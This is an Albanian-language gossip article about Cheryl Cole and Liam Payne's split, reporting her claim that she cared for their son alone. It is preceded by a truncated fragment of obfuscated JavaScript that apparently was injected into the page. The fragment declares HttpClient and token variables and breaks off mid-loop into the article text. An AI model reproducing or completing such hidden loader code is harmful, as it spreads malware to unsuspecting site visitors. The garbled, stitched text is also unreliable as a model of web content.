;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Cheryl zbulon pse u nda me Liam

By

Çifti Liam Payne dhe Cheryl Cole i dhanë fund lidhjes së tyre disavjeçare vetëm pak muaj më parë, ngjarje e cila ishte përfolur shumë në media pasi marrëdhënia e këngëtarëve ishte ftohur shumë.

Pas ndarjes ata u shprehën se kishin mbetur miq për shkak të djalit të tyre të vogël.

Mirëpo, Cheryl ka treguar se përgjatë 17 muajve të fundit ajo është kujdesur e vetme për të birin, ndërsa Liam i’u përkushtua shumë karrierës duke e lënë pas dore familjen.

Siç duket ka qenë pikërisht kjo arsyeja e konflikteve të tyre, të cilat çuan deri në ndarjen e çiftit.

Kujtojmë se Liam dhe Cheryl janë njohur në vitin 2008 në “X Factor”, teksa Cheryl ishte pjesë e jurisë dhe Liam një konkurrent vetëm 14 vjeç.

Artikuj të ngjashëm